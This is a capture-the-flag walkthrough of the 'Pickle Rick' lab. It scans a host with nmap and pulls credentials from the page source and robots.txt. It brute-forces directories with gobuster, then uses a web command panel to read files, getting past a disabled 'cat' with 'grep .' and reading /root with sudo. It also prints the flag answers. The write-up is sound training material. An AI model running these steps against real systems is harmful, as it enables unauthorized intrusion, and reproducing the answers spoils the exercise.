Pickle Rick
Task 1: Pickle Rick
What is the first ingredient that Rick needs?
Lets perform a simple
nmap
scan to see which ports are open.
$ nmap -sC -sV 10.10.88.164
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-11 14:52 IST
Nmap scan report for 10.10.88.164
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b0:56:f1:d5:f7:ee:f0:9f:0f:9f:07:88:c6:56:7a:29 (RSA)
| 256 ef:9b:c2:3f:b3:84:8d:22:5e:d2:b4:09:59:ba:be:15 (ECDSA)
|_ 256 0d:2a:4f:24:a0:9f:3d:20:80:31:b8:51:42:29:a7:0f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.91 seconds
There are two open ports:
22
ssh
80
http
Let's enter the IP address in the browser and see what comes up.

Let's check the page source for more information.

So we have a username now:
R1ckRul3s
. However we don't know the password yet.On most websites, the
robots.txt
file does the job of disallowing web crawlers from accessing particular pages. Let's see if we can find anything there.

Looks like
Wubbalubbadubdub
is the password.But where should we enter these credentials?
In order to find the login page we will have to perform some directory brute-forcing. There are various tools available, but in this case let's use
gobuster
.
$ gobuster dir -u http://10.10.88.164 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.88.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 291]
/login.php (Status: 200) [Size: 882]
/assets (Status: 301) [Size: 313] [--> http://10.10.88.164/assets/]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
-- snip --;
We can see a
/login.php
file. Let's go to the file in the browser.

Let's enter the credentials that we found before i.e.
R1ckRul3s
as username andWubbalubbadubdub
as the password.

We're in and we have a
Command Panel
to enter our commands.We can use the
ls
command to list the files and sub-directories.

The
Sup3rS3cretPickl3Ingred.txt
file seems interesting. Let'scat
the contents of that file.

Oh! So
cat
is disabled. We have to find another way to read the file.We can
grep
all the contents of the file by using the.
regular expression.
grep . Sup3rS3cretPickl3Ingred.txt

Answer
mr. meeseek hair
What is the second ingredient in Rick’s potion?
We can check which user are present by using the following command:
cd /home ; ls

Let's check what files
rick
has using the following command:
cd /home/rick ; ls

Let's see what is in to the
second ingredients
.
grep . /home/rick/"second ingredients"

Answer
1 jerry tear
What is the last and final ingredient?
Let's look at the
/root
directory using the following command:
sudo ls /root

As always, we can use
grep
to read the contents of a file.
sudo grep . /root/3rd.txt

Answer
fleeb juice
Last updated
Was this helpful?